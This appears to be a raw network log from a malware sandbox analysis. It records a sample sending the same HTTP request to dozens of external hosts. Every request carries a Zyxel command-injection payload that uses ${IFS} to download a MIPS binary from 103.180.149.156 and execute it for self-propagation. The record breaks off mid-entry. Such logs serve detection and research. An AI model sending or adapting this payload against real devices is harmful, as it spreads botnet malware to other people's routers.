                                                        Feb 2, 2024 06:20:57.675323963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1271192.168.2.1452322222.10.229.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675345898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1272192.168.2.1434136182.112.227.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675374031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1273192.168.2.1455208200.175.44.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675424099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1274192.168.2.145149481.46.19.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675472021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1275192.168.2.143518220.187.84.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675506115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1276192.168.2.1442942220.34.252.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675525904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1277192.168.2.1460648141.190.249.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675560951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1278192.168.2.1455858114.5.50.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675596952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1279192.168.2.1460256157.31.91.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675637960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1280192.168.2.1453258138.173.117.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675668955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1281192.168.2.145344260.17.117.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675714970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1282192.168.2.144383081.235.201.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675750971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1283192.168.2.145428071.251.202.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675787926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1284192.168.2.1434964216.161.152.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675838947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1285192.168.2.144794087.194.180.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675884008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1286192.168.2.1458850145.136.40.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675910950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1287192.168.2.144235219.60.201.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675954103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1288192.168.2.143770013.32.246.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.675985098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1289192.168.2.144647687.131.184.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676003933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1290192.168.2.145662275.129.152.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676058054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1291192.168.2.145570442.70.89.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676094055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1292192.168.2.1444016150.50.174.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676125050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1293192.168.2.145657273.181.133.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676162958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1294192.168.2.1454468125.94.119.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676217079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1295192.168.2.1441188107.232.206.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676229000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1296192.168.2.1449724116.166.100.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676279068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1297192.168.2.1453902165.96.174.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676321983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1298192.168.2.1453238194.136.108.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676337957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1299192.168.2.1434010104.60.92.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676408052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1300192.168.2.1438736111.148.59.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676455975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1301192.168.2.1442882104.123.174.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676482916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1302192.168.2.1457366136.39.42.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676552057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1303192.168.2.1459162166.186.111.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676584005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1304192.168.2.1439280169.16.7.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676614046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1305192.168.2.1457452138.165.169.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676629066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1306192.168.2.143622625.161.6.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676672935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1307192.168.2.1460566212.87.145.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676721096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1308192.168.2.1453134145.83.60.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676759958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1309192.168.2.1451078103.52.58.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676789999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1310192.168.2.144420484.226.108.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676815033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1311192.168.2.1437140155.87.33.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676866055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1312192.168.2.1449616106.14.93.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676897049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1313192.168.2.14478004.16.36.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676934004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1314192.168.2.144089878.92.181.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676980019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1315192.168.2.1437996199.243.67.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.676999092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1316192.168.2.1443878212.162.115.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677047014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1317192.168.2.145120682.65.6.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677073002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1318192.168.2.1447336194.65.251.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677097082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1319192.168.2.143884676.11.27.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677131891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1320192.168.2.1458536164.96.186.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677160025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1321192.168.2.1447068178.33.219.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677210093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1322192.168.2.144877251.147.101.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677244902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1323192.168.2.1439936125.18.110.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677267075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1324192.168.2.144023885.23.76.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677313089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1325192.168.2.145213663.146.71.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677345991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1326192.168.2.1449426121.152.95.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677393913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1327192.168.2.1439938183.133.25.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677427053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1328192.168.2.1448408159.56.221.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677467108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1329192.168.2.144637069.168.145.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677481890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1330192.168.2.1455478192.112.249.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677515030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1331192.168.2.1457978100.22.73.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677572966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1332192.168.2.1440318210.160.231.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677604914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1333192.168.2.1435018112.135.11.111443
                                                        TimestampBytes transferredDirectionData
